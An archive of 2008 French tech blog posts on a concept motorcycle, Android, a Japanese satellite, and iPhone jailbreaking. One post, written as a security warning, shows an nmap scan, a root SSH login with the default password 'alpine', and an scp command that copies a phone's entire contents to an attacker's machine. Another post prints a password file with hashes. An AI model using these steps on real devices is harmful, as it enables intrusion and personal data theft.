Moto concept : Dodge Tomahawk … concept quoi !

Dodge TomahawkOn est assez loin de la Dodge d’AL Bundy dans Marié 2 enfants, vue sur Allpar.com, cette bécane est pour le moins hors norme avec ses 10 cylindres en V et son design à faire passer une Harley pour un vespa. Si elle fait 3G+ vous pouvez même demander à votre patron de vous en payer une de fonction 😉
Sinon vu que ça court pas les rues je ne saurais pas vous dire si ce bidule est pour faire de la route ou pour flamber entre deux feus rouge dans Paris, en tout cas elle a vraiment de la tronche.

Et en plus elle roule :

[wp_youtube]zINujts5oZM[/wp_youtube]

3GSM : Au Barcelone Mobile Expo Google Android retient l’attention

AndroidLe Barcelone Mobile Expo (3GSM 2008) aura été pour Android, le système d’exploitation open source de Google, l’occasion de se présenter à la pesse, pas mal d’images de gPhone ou tout simplement de l’OS lui même qui rappelons le n’est pas encore terminé (d’ailleurs, l’affreuse interface graphique que vous pouvez voir sur ces images ne sera surement pas ce à quoi Android va ressembler à son lancement grand public. Rappelons que pour contrer l’iPhone, nous avons longtemps entendus parler d’un gPhone. Prenant tout le monde à revers, Google a décidé de s’allier a de nombreux constructeurs de téléphones pour leur proposer un OS open source commun sur une base Linux : Android. Cette architecture ouverte alliée à la motivation de développeurs qui bénéficient d’un kit de développement, d’un émulateur et de tout ce qu’il faut pour s’amuser, a déjà tout pour séduire. On attend compiz sur iPhone dans pas longtemps 😉
Google devrait facilement arriver au second semestre 2008 à proposer une première version utilisable d’Android.

Voir le Google Code du projet Android

Ultra Haut débit : Le Japon lance Kizuna, un satellite expérimental pour l’accès à Internet

kizunaL’idée est de couvrir les zones non desservies par la fibre optique et l’ADSL, qui nécessitent une forte densité de population pour être rentables. Le japon n’a pas fait les choses à moitié et vient de lancer un satellite expérimental qui devrait permettre des transmissions à 1,2 gigabits secondes, en crête, 12 fois plus rapide que du FTTH. C’est une première mondiale, Kizuna (entre autres le nom d’un manga) sera à l’essai pour une durée de 5 ans avant de voir sa version commerciale envisagée (en pratique on peut tabler sur beaucoup moins tant ce projet revêt d’une importance stratégique particulière).

Technnologiquement c’est génial, mais en terme de business, le Japon est tout simplement sur le point de dégrouper le monde … c’est un peu ça oui ! Cette connexion très haut débit via un satellite permet surtout pour un fournisseur d’accès de se passer d’infrastructures terrestres pour déployer ses services. Économiquement l’impact est énorme puisque un opérateur japonais sera maintenant capable d’être présent dans le monde entier, même si le client final habite dans des contrées très reculées, peu importe, il bénéficiera du même débit que les les autres abonnés au service ! Ca prête un peu à sourire jaune quand on voit que ça fait bientôt 18mois que Free, mon FAI m’a annoncé la fibre optique pour l’année dernière … j’ai aussi une pensée émue pour les non dégroupés adsl 😉

A terme on imagine aussi facilement que les fournisseurs d’accès offriront par ce biais des services de téléphonie SIP, le marché semble énorme, et les premiers sont les japonais. Le coût de ce satellite est de 342 millions de dollars, on se cotise pour envoyer le nôtre ?

Voir la news sur Engadget(us)

Software Developement Kit reporté à Mars par Apple

desimlocked and jailbreaked iphone with 1.1.3On attend tous la sortie du firmware 1.1.4 qui devrait voir l’apparition d’applications tierces « officielles » et surtout la mise en ligne du SDK (Software Development kit) qui devrait permettre le développement d’applications plus propres.

Initialement prévu pour février, il va falloir, d’après une news d’Apple insider, attendre jusqu’en mars prochain pour pouvoir découvrir le jouet.

Make my iPhone sexy : main script execution error avec le firmware 1.1.3

Un scan nmap et c’est le drame

Previously in prison … euh Jailbreak : pas le droit de toucher à passwd sous peine de bricker votre iPhone.
Pour palier la lacune de passwd, j’ai voulu éditer le /etc/master.passwd … manque de bol, impossible d’installer le bsd subsystems tools. Une vieille histoire de permissions foireuses, pas très grave mais blocante pour la suite des opérations : du coup pas de vi, pas de ls, pas de cat, pas de chown …. fâcheux pour les permissions… bref un truc inutilisable. Voici ce qui a fonctionné pour moi :

-sh-3.2# cd /Applications
-sh-3.2# chmod +s Installer.app/Installer

Je redémarre complètement l’iPhone

Je retente l’installation du bsd subsystem tool et hop tout passe comme une lettre à la poste : nous y voici, je peux maintenant éditer à coup de vi mes pass encodés.

-sh-3.2# cat /etc/master.passwd
##
# User Database
#
# Note that this file is consulted when the system is running in single-user
# mode. At other times this information is handled by lookupd. By default,
# lookupd gets information from NetInfo, so this file will not be consulted
# unless you have changed lookupd's configuration.
##
nobody:*:-2:-2::0:0:Unprivileged User:/var/empty:/usr/bin/false
root:/smx7MYTQIi2M:0:0::0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501::0:0:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1::0:0:System Services:/var/root:/usr/bin/false
unknown:*:99:99::0:0:Unknown User:/var/empty:/usr/bin/false
_securityd:*:64:64::0:0:securityd:/var/empty:/usr/bin/false

Ne le faites pas … c’est un splendide moyen de le bricker.

iPhone Hacks : Jailbreakez votre iPhone en 1.1.3 et offrez vos données personnelles aux script kiddies

Un scan nmap et c’est le drameEn m’amusant un peu avec l’iPhone et l’iPod Touch, j’avais constaté certains courants d’air. A plusieurs reprise sur ce blog ou sur Toonux.org, j’ai succinctement abordé les problèmes de sécurité inhérents à la mobilité, certes, mais là… il faut bien avouer qu’avec un iPhone Jailbreaké, on dipsose d’une splendide passoire numérique.

L’objectif de ce blog n’est vraiment pas dispenser des cours magistraux de sécurité et je n’en ai d’ailleurs pas le niveau. Oui mais voilà, ce que j’ai vu de l’iPhone me choque. Le problème dépasse de loin les flow de Safari qui permettent l’installation de l’installer.app.

Avec les firmwares 1.1.1 et 1.1.2, il était relativement aisé de protéger un minimum vos données personnelles (en clair les 8, 16 ou 32go de données que votre iPhone peut accueillir : mp3 … ouai bof, mais surtout carnet d’adresse, mails … passwords …

Ces terminaux disposent d’un système d’exploitation basé sur un Unix « terreux », pas tout à fait sale mais super loin d’être propre. En standard nous avons donc 2 comptes :

  • Un compte root avec lequel on peut faire la pluie et le beau temps
  • Un compte mobile beaucoup plus limité.
  • Très vite après l’installation de l’installer, je vois apparaître un message qui m’horrifie… on ne peut pas utiliser la commande passwd pour changer le password root de l’iPhone sous peine de voir Springboard redémarrer toutes les 5 secondes ! Comprenez que j’ai sshd activé sur mon terminal et que je ne peux pas changer le password root! J’ai beau ne pas être parano, tout ceci me dérange particulièrement. Pourquoi ? tout simplement parce qu’il suffit que je me connecte sur un réseau wifi pour offrir TOUT ce qui est contenu dans mon téléphone à un petit malin ! Pour la faire simple voilà comment un script kiddy peut peut procéder pour me rooter :
  • mon iphone est connecté sur le même réseau wifi qu’un emmerdeur que nous allons appeler Jean-Kevin
  • Jean-kevin est un petit malin qui connaît nmap
  • pour se connecter il va avoir besoin de mon adresse ip
  • un petit ifconfig va lui donner une indication sur la plage ip du routeur dont le serveur dhcp attribue aussi l’ip de mon iphone, si l’ip de ce routeur ressemble à ça 192.168.0.1 il va pouvoir scanner simplement toutes les machines du réseau à la recherche d’une victime

Il lancera par exemple cette commande :

Quicksilver:~ Jean-Kevin$ sudo nmap -sS -v -O 192.168.0.1/24

ce qui lui retournera au moment ou le scanne passera sur l’ip de mon iPhone ceci :

Starting Nmap 4.20 ( http://insecure.org ) at 2008-02-16 23:40 CET
Initiating ARP Ping Scan at 23:40
Scanning 192.168.0.46 [1 port]
Completed ARP Ping Scan at 23:40, 0.15s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:40
Completed Parallel DNS resolution of 1 host. at 23:40, 0.03s elapsed
Initiating SYN Stealth Scan at 23:40
Scanning 192.168.0.46 [1697 ports]
Discovered open port 22/tcp on 192.168.0.46
Increasing send delay for 192.168.0.46 from 0 to 5 due to 173 out of 575 dropped probes since last increase.
Increasing send delay for 192.168.0.46 from 5 to 10 due to 52 out of 172 dropped probes since last increase.
Increasing send delay for 192.168.0.46 from 10 to 20 due to max_successful_tryno increase to 4
Completed SYN Stealth Scan at 23:40, 24.56s elapsed (1697 total ports)
Initiating OS detection (try #1) against 192.168.0.46
Retrying OS detection (try #2) against 192.168.0.46
Retrying OS detection (try #3) against 192.168.0.46
Retrying OS detection (try #4) against 192.168.0.46
Retrying OS detection (try #5) against 192.168.0.46
Host 192.168.0.46 appears to be up ... good.
Interesting ports on 192.168.0.46:
Not shown: 1695 closed ports
PORT STATE SERVICE
22/tcp open ssh
692/tcp filtered unknown
MAC Address: 00:1E:C2:C6:F4:C2 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see http://insecure.org/nmap/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=4.20%D=2/16%OT=22%CT=1%CU=40160%PV=Y%DS=1%G=Y%M=001EC2%TM=47B7666
OS:9%P=i386-apple-darwin9.1.0)SEQ(SP=0%GCD=1%ISR=1B%TI=I%II=I%SS=S%TS=1)SEQ
OS:(SP=0%GCD=1%ISR=1A%TI=I%II=I%SS=S%TS=1)SEQ(SP=0%GCD=1%ISR=1B%TI=I%TS=1)S
OS:EQ(SP=0%GCD=1%ISR=1A%TI=I%II=I%SS=S%TS=1)OPS(O1=M5B4NW0NNT11SLL%O2=M5B4N
OS:W0NNT11SLL%O3=M5B4NW0NNT11%O4=M5B4NW0NNT11SLL%O5=M5B4NW0NNT11SLL%O6=M5B4
OS:NNT11SLL)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=
OS:Y%T=40%W=FFFF%O=M5B4NW0SLL%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q
OS:=)T2(R=Y%DF=Y%T=40%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=N)T4(R=Y%DF=Y%T=40%W
OS:=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=40%W=0%S=Z%A=S
OS:%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%TOS=0%IPL=38%UN=0%RIPL=G%RID=G%RIPCK=G
OS:%RUCK=0%RUL=G%RUD=G)IE(R=Y%DFI=S%T=40%TOSI=S%CD=S%SI=S%DLI=S)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=0 (Trivial joke)
IPID Sequence Generation: Incremental
OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 37.377 seconds
Raw packets sent: 3325 (150.770KB) | Rcvd: 1824 (75.380KB)

… on voit donc ici très clairement qu’un appareil au fingerprint un peu space dont la mac adress trahira vite la nature : sur le réseau wifi se trouve un iPhone dont l’ip est 192.168.0.46 qui dispose du port ssh ouvert !

ce qui nous donne dans la tête de notre Jean-Kevin :

iPhone+ssh open+firmware 1.1.3 sur lequel je ne peux pas changer le pass root qui est « alpine » = une splendide opportunité de briller en société en se faisant passer pour un super hacker. Il ne lui reste plus qu’à porter le coup de grâce :

en lançant l’inévitable :


ssh [email protected]

entrer le password « alpine » au prompt

et hop, le voici connecté en root à mon iphone.

Mais comme Jean-Kevin en plus d’être un branleur est aussi un super lamer, il va vous voler vos données avec un :

Quicksilver:~ Jean-Kevin$scp -r /* [email protected]:/home/mesfilesdeh@X0r

… et voilà que Jean-Kevin vient de copier tout le contenu de votre iPhone sur sa machine !

Encore une fois, vous voilà prévenus, un iPhone Jailbreaké avec un firmware 1.1.3 vous empêchant de modifier votre password root est une véritable catastrophe niveau sécurité, évitez donc de vous connecter à n’importe quel réseau wifi, particulièrement dans les lieux publics. Si vous ne savez pas ce que vous faites .. ne le faites pas. Ne perdez pas de vue que quel que soit la version de votre firmware, ne pas changer votre password root ou celui du compte mobile vous expose à cette vulnérabilité dont certain diront qu’il s’agit d’une fonctionnalité 😉

Jailbreak et désimlockage d’un iPhone en 1.1.3 avec Independence 1.4 beta

Independence 1.4 : jailbreak & desimlockage d’iPhone firmware 1.1.3

On m’a offert ce matin un iPhone US !
J’y découvre une carte sim AT&T 3G … je ne savais même pas que l’iPhone faisait de la 3G.

Je suis chez Bouygues, j’ai besoin d’un terminal … donc pas le choix, fallait lui faire sa fête. Ca m’aura pris moins d’une heure, lecture de doc comprise grâce à la nouvelle béta d’Independence.

Cette application pour osx open source est vraiment top, elle sait tout faire : activation / désimlockage / installation de ssh / jailbreak …

Attention cette version de indépendence est une béta, elle comporte quelques bugs mais rien d’insurmontable, toutefois il est vivement recommandé d’avoir quelques notions (comme l’utilisation de ssh/scp) avant de vous lancer dans l’aventure.

Je ne répondrai pas ou ne validerai pas les commentaires attestant de la non lecture de cette page là. Vous êtes prévenus, le codeur d’Independence a fait du super boulot, la moindre des choses est donc de le lire, merci d’avance.

iPod Touch et iPhone : Jailbreak cassé avec le firmware 1.1.3, une méthode pour repasser en 1.1.2

Bon voilà, j’ai pas résisté, j’ai essayé, j’ai vu … et je l’ai eu dans le c***.

On respire un grand coup, on se relaxe, et on repasse en 1.1.2… oui mais voilà il va falloir tout refaire from scratch. Et pour ça il va falloir récupérer les firmware de restauration 1.1.2 et 1.1.1

Attention, vous perdrez toutes vos données et vous assumez le fait que vous êtes entièrement responsable de ce que vous faites, vous ne viendrez pas pleurer parce que vous avez perdu vos données ou pire, endommagé votre appareil.

Un lecture préalable complète est requise de ce mini tuto et de ce mini tuto (merci de cliquer sur les liens indiqués dans les tutos avent de poser des questions).

Annoncé à la keynote de Steve Jobs hier, on sait maintenant que les applications de l’iPhone que sont mail, note, GoogleMap, la météo et la bourse sont disponibles moyennant une mise à jour payante. Personnellement ça me fait ni chaud ni froid et j’ai pas attendu cette mise à jour pour pouvoir en bénéficier. Je vous avais expliqué comment dans ce post et vous trouverez les applis en question dans ce post.
C’est donc reparti pour un tour, vous allez voir qu’en ce qui concerne l’iPod, la méthode est exactement la même que pour passer du 1.1.1 au 1.1.2 mais que pour l’instant, vous n’aurez pas le loisir d’avoir votre appareil jailbreaké en 1.1.3, Apple a semble t-il mis le paquet (en clair ca veut dire que ça prendra peut être quelques heures de plus aux hackers qui nous permettront dans les jours qui viennent de rendre ceci possible). Attention, n’ayant pas d’iPhone sous la main je n’ai pu tester ça que sur un iPod Touch, attention donc pour la partie desimlockage et Independence !

1° Je ne sais pas pour vous, mais personnellement, je n’ai pas mis à jour iTune… juste comme ça par méfiance, vous me direz donc si ça fonctionne avec la dernière mise à jour.

2° On récupère le firware 1.1.1 : c’est ici… mais aussi le 1.1.2 et celui la vous le trouverez . il va évidemment falloir downgrader.

3° Votre appareil est branché à votre ordinateur et vous avez iTune fermé. On reboot maintenant notre iPod ou notre iPhone en pressant le bouton power en haut à gauche de l’appareil et le bouton home, au bout d’une dizaine de secondes on relâche le bouton power du haut mais on maintient la pression sur le bouton home. Hop vous allez avoir iTune qui démarre et vous allez découvrir que vous êtes en recovery mode … c’est bien ce que l’on voulait (cliquez sur l’image ci dessous pour agrandir)

image-3.png

4° Attention à ce stade : sur un mac cliquez sur restaurer en maintenant la touche ALT enfoncée (sous windaube ça doit être shift), vous allez pouvoir sélectionner le firmware 1.1.1 en local sur votre machine.(cliquez sur l’image ci dessous pour agrandir). C’est super long … ne tripotez pas votre iPod, laissez le vivre sa vie jusqu’à la fin du downgrade.

image-4.png

5°On passe donc au premier jailbreak pour le 1.1.1 : on reboot notre iPod en mode normal, on se connecte et on va sur http://jailbreakme.com exécuter le flow qui exploite le trou de sécurité sur le format tif qui nous permet d’installer l’installer.app.

6° on prépare notre appareil pour le jailbreak 1.1.2 avec oktoprep que vous trouverez dans les applications installables en lançant l’installer.app dans la rubrique tweaks pour 1.1.1

7° Notre iPod est maintenant ready pour le 1.1.2, on va donc faire exactement la même chose que dans le 4° mais en sélectionnant cette fois le firmware 1.1.2 que nous avons préalablement téléchargé.

Ok nous y sommes et maintenant pour installer les applications de l’iPhone, je vous laisse vous référer à cette explication ou à la méthode semble t-il plus simple suggérée dans le commentaire de ce post par thibault par ici.

Firmware 1.1.3 pour iPod Touch et iPhone en déploiement

113-firmware.pngnouveau-firm-ipod.pngLa journée a été plutôt chargée chez Apple, après l’annonce par Steve Jobs du nouveau ultra portable signé Apple, le Macbook Air, voici qu’un nouvelle version du firmware de l’iPod Touch et de l’iPhone est maintenant disponible, voilà que nous pouvons maintenant acheter via l’iTune Store et qu’il corrige « des bugs » … oui enfin moi le seul bug que je lui voyais à mon ipod (en dehors de celui d’avoir besoin de iTune et d’être pas franchement un modèle d’ouverture open source) c’est de pas avoir de micro pour faire fonctionner mon client SIP.

Attention comme pour le firmware 1.1.2, le firmware 1.1.3 corrige le flow dans Safari qui permet le jailbreak de votre appareil, il faudra donc, encore une fois le downgrader en 1.1.1 pour pouvoir jailbreaker le firmware 1.1.3… on va également prendre soin d’aller voir ce qui se passe du côté de OktoPrep avant d’upgrader de 1.1.2 à 1.1.3.
———————

iPhone/iPod touch v1.1.3
Références CVE : CVE-2008-0035
Disponible pour : iPhone v1.0 à v1.1.2, iPod touch v1.1 à 1.1.2
Conséquences : l’accès à un site Web malveillant peut entraîner la fermeture d’une application ou l’exécution de code arbitraire
Description : il existe un problème de corruption de la mémoire au niveau de la gestion par Safari des URL. En poussant un utilisateur à accéder à une URL construite de manière malveillante, un attaquant peut provoquer un blocage inattendu de l’application ou l’exécution de code arbitraire. Cette mise à jour résout le problème en réalisant des validations supplémentaires sur les URL.

———————-

Le verrouillage par code se prend lui aussi son petit patch et Safari qui est décidemment un vraie passoire (si si je vous assure, j’ai pu voir aujourd’hui comment il réagissait avec JQuery sur une page avec un script AdSense) se prend lui aussi un correctif sur une vulnérabilité de cross site scripting.

Enfin, si vous souhaitez conserver votre iPod Touch Jailbreaké fonctionnel : n’UPGRADEZ SURTOUT PAS POUR L’INSTANT !